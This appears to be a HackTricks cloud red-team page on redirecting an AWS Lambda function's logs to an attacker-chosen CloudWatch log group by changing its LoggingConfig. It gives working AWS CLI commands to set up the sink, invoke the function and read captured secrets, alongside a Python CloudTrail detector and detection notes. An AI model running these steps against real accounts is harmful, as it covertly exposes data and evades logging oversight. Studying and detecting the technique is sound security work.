AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse lambda:UpdateFunctionConfiguration together with Lambda's advanced logging controls (LoggingConfig) to redirect a function's logs to an attacker-chosen CloudWatch Logs log group. This works without changing the function code or its execution role: most Lambda roles already carry logs:CreateLogGroup, logs:CreateLogStream and logs:PutLogEvents via the AWSLambdaBasicExecutionRole managed policy, and Lambda writes to whatever log group the configuration names (it must be in the same account and Region as the function). If the function prints secrets or request bodies, or crashes with stack traces, you collect them from the new log group while the original /aws/lambda/<fn> group quietly stops receiving new streams.
Required permissions
- lambda:UpdateFunctionConfiguration
- lambda:GetFunctionConfiguration
- lambda:InvokeFunction (or rely on existing triggers)
- logs:CreateLogGroup (often not required if the function role has it)
- logs:FilterLogEvents (to read events)
Steps
- Create a sink log group
aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
- Redirect the target function logs
aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1
LogFormat=JSON is required for ApplicationLogLevel to take effect; DEBUG makes sure nothing the function logs is filtered out. Wait until LastUpdateStatus becomes Successful (until then invocations still use the old config):
aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text
- Invoke and read from the sink
aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
Impact
- Covertly redirect all application and system logs to a log group you control, bypassing the expectation (and any detection, retention or subscription-filter rules) that logs only land in /aws/lambda/<fn>.
- Exfiltrate sensitive data printed by the function or surfaced in errors and stack traces.
- The original /aws/lambda/<fn> group stops receiving new log streams, which is itself a signal defenders can alert on.
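The procedure above and the detection angle from the Impact section, as an added example that is not HackTricks' or AWS's own code. It builds the same LoggingConfig structure the CLI sends (refusing log levels with Text format, since they only apply to JSON), renders the --logging-config shorthand used in step 2, and runs a small detector over constructed CloudTrail records that flags UpdateFunctionConfiguration calls moving a function's logs off /aws/lambda/<fn>. The CloudTrail field layout (eventName starting with UpdateFunctionConfiguration, camelCase requestParameters.functionName and loggingConfig.logGroup) and the sample records are assumptions to verify against a real trail; the account ID and function names are made up.

```python
"""Lambda LoggingConfig redirection: build the request, detect it in CloudTrail.

Added example; not HackTricks' code. Runs fully offline: the CloudTrail
records below are constructed samples, and the field layout assumed for them
(eventName starting with "UpdateFunctionConfiguration", camelCase
requestParameters.functionName / loggingConfig.logGroup) is an assumption to
verify against real trail output.
"""
import json
from typing import Dict, List, Optional

VALID_FORMATS = ("Text", "JSON")


def default_log_group(function_name: str) -> str:
    """Log group Lambda writes to when LoggingConfig.LogGroup is not set."""
    return f"/aws/lambda/{function_name}"


def build_logging_config(log_group: str, log_format: str = "JSON",
                         app_level: Optional[str] = None,
                         sys_level: Optional[str] = None) -> Dict[str, str]:
    """LoggingConfig structure sent by UpdateFunctionConfiguration.

    ApplicationLogLevel/SystemLogLevel only take effect with LogFormat=JSON,
    so a Text-format config carrying levels is rejected here rather than sent.
    """
    if log_format not in VALID_FORMATS:
        raise ValueError("LogFormat must be Text or JSON")
    if log_format == "Text" and (app_level or sys_level):
        raise ValueError("log levels require LogFormat=JSON")
    cfg = {"LogGroup": log_group, "LogFormat": log_format}
    if app_level:
        cfg["ApplicationLogLevel"] = app_level
    if sys_level:
        cfg["SystemLogLevel"] = sys_level
    return cfg


def cli_shorthand(cfg: Dict[str, str]) -> str:
    """Render the config as the --logging-config shorthand the AWS CLI accepts."""
    return ",".join(f"{k}={v}" for k, v in cfg.items())


def _function_name(value: str) -> str:
    """CloudTrail may carry the bare name or the full ARN; reduce both to the name."""
    if ":function:" in value:
        value = value.split(":function:", 1)[1]
    return value.split(":", 1)[0]  # drop a trailing ":alias" or ":version"


def find_log_redirects(records: List[dict]) -> List[dict]:
    """Flag UpdateFunctionConfiguration calls that move logs off /aws/lambda/<fn>."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "lambda.amazonaws.com":
            continue
        if not rec.get("eventName", "").startswith("UpdateFunctionConfiguration"):
            continue
        params = rec.get("requestParameters") or {}
        logging_cfg = params.get("loggingConfig") or {}
        target = logging_cfg.get("logGroup")
        if not target:
            continue  # no log-group change in this call
        fn = _function_name(params.get("functionName", ""))
        if target == default_log_group(fn):
            continue  # explicitly set (back) to the default group
        findings.append({
            "function": fn,
            "log_group": target,
            "actor": (rec.get("userIdentity") or {}).get("arn"),
            "time": rec.get("eventTime"),
        })
    return findings


# Constructed sample trail: one redirect, one revert to default, one unrelated change.
SAMPLE_TRAIL = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
     "requestParameters": {
         "functionName": "arn:aws:lambda:us-east-1:111122223333:function:orders-api",
         "loggingConfig": {"logGroup": "/aws/hacktricks/ht-log-sink",
                           "logFormat": "JSON", "applicationLogLevel": "DEBUG"}}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ops"},
     "requestParameters": {"functionName": "orders-api",
                           "loggingConfig": {"logGroup": "/aws/lambda/orders-api",
                                             "logFormat": "Text"}}},
    {"eventTime": "2024-05-01T10:06:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ops"},
     "requestParameters": {"functionName": "orders-api", "memorySize": 512}},
]

if __name__ == "__main__":
    print(cli_shorthand(build_logging_config("/aws/hacktricks/ht-log-sink", "JSON", "DEBUG")))
    print(json.dumps(find_log_redirects(SAMPLE_TRAIL), indent=2))
```

On a real account, feed find_log_redirects the records from `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=UpdateFunctionConfiguration20150331v2` (each CloudTrailEvent field is a JSON string to parse first); the detector deliberately ignores calls that only change LogFormat or log levels, since those do not move the logs.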
Cleanup
Record the function's original LoggingConfig (get-function-configuration shows it) before step 2 and restore exactly that. If it was the default Text format, do not pass log levels, which only apply to JSON:
aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text \
--region us-east-1 || true
Notes
- Logging controls are part of Lambda's LoggingConfig (LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel). The two log levels only take effect when LogFormat is JSON.
- By default Lambda sends logs to /aws/lambda/<function>, but LogGroup can name any log group in the same account and Region; Lambda creates it on first invocation if the execution role allows logs:CreateLogGroup.
- The change is recorded in CloudTrail as an UpdateFunctionConfiguration call (logged with its API-version suffix, e.g. UpdateFunctionConfiguration20150331v2) whose requestParameters carry the new loggingConfig, and the original log group stops receiving new streams; both are what defenders should alert on.